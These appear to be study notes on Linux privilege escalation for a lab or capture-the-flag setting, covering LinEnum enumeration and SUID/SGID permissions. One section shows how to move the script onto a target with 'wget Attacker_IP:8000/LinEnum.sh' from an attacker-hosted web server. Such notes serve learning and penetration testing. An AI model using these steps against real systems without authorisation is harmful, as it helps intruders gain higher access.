Direction of Privilege Escalation

• Horizontal Privesc: Taking over a different user who is on the same privilege level as us ( travel sideways on the tree).
• Vertical Privesc: Attempt to gain higher privileges or access, with an existing account that we have already compromised.

Enumeration

LinEnum

• It is a simple bash script that performs common commands related to privilege escalation.
• It can be downloaded from https://github.com/rebootuser/LinEnum

Getting LinEnum on the target machine

• Method 1:
  • Go to the directory in which we have the LinEnum stored in, and start a python web server using - python3 -m http.server 8000
  • Use wget on the target machine to grab the file as - wget Attacker_IP:8000/LinEnum.sh
  • Then make the file executable using chmod +x [LinEnum.sh](<http://LinEnum.sh>)
• Method 2:
  • If we are unable to transport the file as described in the above method, and if we have sufficient permissions, then we can copy the raw LinEnum code from our local machine.
  • Paste it in any text editor in the Target machine, and save it as LinEnum.sh
  • Then make the file executable using the command chmod +x LinEnum.sh

Understanding LinEnum Output

• Output is broken down into different sections. The main sections are:
  • Kernel: Kernel info is shown here. Most likely a kernel exploit available for this machine.
  • Can we read/write sensitive files: These are the files that any authenticated user can read and write to. By looking at the permissions, we can see where there is misconfiguration that allows users, which shouldn’t be able to, to write to sensitive files.
  • SUID Files: Output for SUID files is shown. SUID (Set owner user ID) is a special file permission. It allows the file to run with permissions of whoever the owner is.
  • Crontab Contents: Scheduled cron jobs are shown.

Abusing SUID/GUID Files

Finding and Exploiting SUID files

• The maximum number of bit that can be used to set permission for each user is 7 - read(4) , write(2) and execute (1).
• Example - rwxr-xr-x denotes the permission of 755.
• When special permission is given to each user, it becomes SUID or SGID.
• When extra bit “4” is set to user(owner) it becomes SUID.
• When bit “2” is set to group it becomes SGID ( Set Group ID).